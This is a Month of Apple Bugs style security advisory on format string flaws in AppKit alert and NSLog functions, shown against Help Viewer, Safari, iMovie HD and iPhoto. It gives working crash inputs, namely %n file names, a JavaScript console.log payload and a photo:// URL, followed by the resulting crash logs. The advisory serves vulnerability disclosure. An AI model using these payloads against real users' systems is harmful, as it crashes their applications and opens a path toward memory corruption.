BACK

CREDIT

POC or EXPLOIT

REFERENCES


Sketch

Summary

As MOAB begins to come to a close we have decided that it is time for a montage of some sort. By definition alone we can bring you nothing short of a closely juxtaposed composite of pure pwnage. Lucky for us Apple's AppKit framework and a few Apple Developers are all we need.

Previously we have highlighted format string issues in Apple Installer, Software Update, iChat, and iPhoto. In today's montage we will add Apple Help Viewer, Safari and iMovie to the list. Coincidentally iPhoto will also be making a return visit (ala Jim Jones). Long live Team America, too.

Affected versions

The following versions were used during our testing:
Help Viewer 3.0.0 (144.1)
Safari 2.0.4 (419.3)
iMovie HD 6.0.3 (267.2)
iPhoto 6.0.5 (316)

Proof of concept, exploit or instructions to reproduce

As we have mentioned in past releases, the origins of these problems are related to the following functions from Apple's AppKit framework:

* NSBeginAlertSheet
* NSBeginCriticalAlertSheet
* NSBeginInformationalAlertSheet
* NSGetAlertPanel
* NSGetCriticalAlertPanel
* NSGetInformationalAlertPanel
* NSReleaseAlertPanel
* NSRunAlertPanel
* NSRunCriticalAlertPanel
* NSRunInformationalAlertPanel
* NSLog

Multiple developers of Apple based software including Apple's own developers seem to have a misunderstanding of how to properly use the above functions. "For the shake of lulz alone a montage must ensue..."

Safari, iMovie and Help Viewer:

joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.download
joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.imovieproj
joe-schmoes-computer:/tmp js$ touch %n%n%n%n%n%n%n%n%n%n%n.help         
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.download 
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.imovieproj
joe-schmoes-computer:/tmp js$ open %n%n%n%n%n%n%n%n%n%n%n.help 
joe-schmoes-computer:~/Library/Logs/CrashReporter js$ ls
Help Viewer.crash.log   Safari.crash.log        iMovie HD.crash.log

Safari:

joe-schmoes-computer:/tmp js$ cat test.html 
<script>
window.console.log('%n%n%nOh it takes a montage%n%n%n')
</script>

joe-schmoes-computer:/tmp js$ open test.html 
joe-schmoes-computer:~/Library/Logs/CrashReporter js$ ls
Safari.crash.log

iPhoto:

joe-schmoes-computer:/tmp js$   open 'photo://%25n%25n%25n%25n%25n%25n'
joe-schmoes-computer:/tmp js$ ls ~/Library/Logs/CrashReporter/
iPhoto.crash.log

Debugging Montage

iPhoto:

Version:        6.0.5 (6.0.5)
Build Version:  2
Project Name:   iPhotoProject
Source Version: 3160000

PID:    874
Thread: 0

Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_PROTECTION_FAILURE (0x0002) at 0x925da956

Thread 0 Crashed:
0   libSystem.B.dylib           0x9000c0c1 __vfprintf + 4976
1   libSystem.B.dylib           0x90100ea9 snprintf_l + 504
2   com.apple.CoreFoundation    0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3   com.apple.CoreFoundation    0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4   com.apple.Foundation        0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162
5   com.apple.Foundation        0x92678e6c +[NSString localizedStringWithFormat:] + 129
6   com.apple.iPhoto            0x0002ae3a 0x1000 + 171578
7   com.apple.iPhoto            0x0031298f 0x1000 + 3217807

Safari:

Version:        2.0.4 (419.3)
Build Version:  7
Project Name:   WebBrowser
Source Version: 4190300

PID:    455
Thread: 0

Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_PROTECTION_FAILURE (0x0002) at 0x00000020

Thread 0 Crashed:
0   libobjc.A.dylib             0x90a55380 objc_msgSend + 16
1   com.apple.AppKit            0x93364838 -[NSWindow(Sheets) _positionSheetConstrained:andDisplay:] + 278
2   com.apple.AppKit            0x9336785e -[NSMoveHelper(Sheets) _moveParent:andOpenSheet:] + 424
3   com.apple.AppKit            0x9336759a -[NSWindow(Sheets) _orderFrontRelativeToWindow:] + 168
4   com.apple.AppKit            0x9328f9ec -[NSWindow _reallyDoOrderWindow:relativeTo:findKey:forCounter:force:isModal:] + 2877
5   com.apple.AppKit            0x933389d8 -[NSApplication _orderFrontModalWindow:relativeToWindow:] + 1074
6   com.apple.AppKit            0x9333833a -[NSApplication _commonBeginModalSessionForWindow:relativeToWindow:modalDelegate:didEndSelecto$
7   com.apple.AppKit            0x93364f7d -[NSApplication beginSheet:modalForWindow:modalDelegate:didEndSelector:contextInfo:] + 122
8   com.apple.AppKit            0x9335f3bf _NXDoLocalRunAlertSheet + 922
9   com.apple.AppKit            0x9335f022 NSBeginAlertSheet + 100
10  com.apple.Safari            0x0008300f 0x1000 + 532495

Help Viewer:

Version:        3.0.0 (144.1)
Build Version:  20
Project Name:   HelpViewer
Source Version: 1440800

PID:    970
Thread: 0

Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_PROTECTION_FAILURE (0x0002) at 0x9a1ab5ac

Thread 0 Crashed:
0   libSystem.B.dylib           0x9000c0c1 __vfprintf + 4976
1   libSystem.B.dylib           0x90100ea9 snprintf_l + 504
2   com.apple.CoreFoundation    0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3   com.apple.CoreFoundation    0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4   com.apple.Foundation        0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162
5   com.apple.Foundation        0x925fc670 -[NSString initWithFormat:arguments:] + 55
6   com.apple.AppKit            0x9336056f -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] + 144
7   com.apple.AppKit            0x9335f2e0 _NXDoLocalRunAlertSheet + 699
8   com.apple.AppKit            0x9335f022 NSBeginAlertSheet + 100
9   com.apple.helpui            0x9a1aca64 -[HelpViewController _displayAlertMessage:withInformativeText:] + 165
10  com.apple.helpui            0x9a1ab79e -[HelpViewController webView:unableToImplementPolicyWithError:frame:] + 512

iMovie HD:

Version:        6.0.3 (6.0.3)
Build Version:  14
Project Name:   iMovieApp
Source Version: 2670200

PID:    1013
Thread: 0

Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_PROTECTION_FAILURE (0x0002) at 0x00000000

Thread 0 Crashed:
0   libSystem.B.dylib           0x9000c0c1 __vfprintf + 4976
1   libSystem.B.dylib           0x90100ea9 snprintf_l + 504
2   com.apple.CoreFoundation    0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3   com.apple.CoreFoundation    0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4   com.apple.Foundation        0x925daa5d -[NSPlaceholderString initWithFormat:locale:arguments:] + 162
5   com.apple.Foundation        0x925fc670 -[NSString initWithFormat:arguments:] + 55
6   com.apple.AppKit            0x9336056f -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] + 144
7   com.apple.AppKit            0x934ac77a _NXDoLocalRunAlertPanel + 683
8   com.apple.AppKit            0x93588ad6 NSRunCriticalAlertPanel + 69
9   com.apple.iMovie            0x000f3f3e 0x1000 + 995134
10  com.apple.iMovie            0x000f3fcf 0x1000 + 995279
Safari (debug enabled):

defaults write com.apple.Safari IncludeDebugMenu 1

Version:        2.0.4 (419.3)
Build Version:  7
Project Name:   WebBrowser
Source Version: 4190300

PID:    1042
Thread: 0

Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_PROTECTION_FAILURE (0x0002) at 0x90a9755c

Thread 0 Crashed:
0   libSystem.B.dylib        	0x9000c0c1 __vfprintf + 4976
1   libSystem.B.dylib        	0x90100ea9 snprintf_l + 504
2   com.apple.CoreFoundation 	0x908119d5 _CFStringAppendFormatAndArgumentsAux + 4018
3   com.apple.CoreFoundation 	0x9081091c _CFStringCreateWithFormatAndArgumentsAux + 122
4   com.apple.Foundation     	0x92605ab9 NSLogv + 85
5   com.apple.Foundation     	0x926433a5 NSLog + 27
6   libobjc.A.dylib          	0x90a58c56 objc_msgSendv + 54
7   com.apple.Foundation     	0x925f443e -[NSInvocation invoke] + 932
8   com.apple.JavaScriptCore 	0x9527deab KJS::Bindings::ObjcInstance::invokeMethod(KJS::ExecState*, KJS::Bindings::MethodList const&, KJS::List const&) + 1047
9   com.apple.JavaScriptCore 	0x9527a220 KJS::RuntimeMethodImp::call(KJS::ExecState*, KJS::Object&, KJS::List const&) + 228
10  com.apple.JavaScriptCore 	0x9523f77e KJS::Object::call(KJS::ExecState*, KJS::Object&, KJS::List const&) + 158

Notes

Exploitation conditions

All of these functions have behavior similar to printf(). Due to a bug in CoreFoundation, these issues are currently difficult to exploit for code execution. Still, certain conditions exist that make it possible under certain circumstances.

Workaround or temporary solution

Seek out Landon Fuller and he shall destroy all that is evil!

All your AlertPanel are belong to us.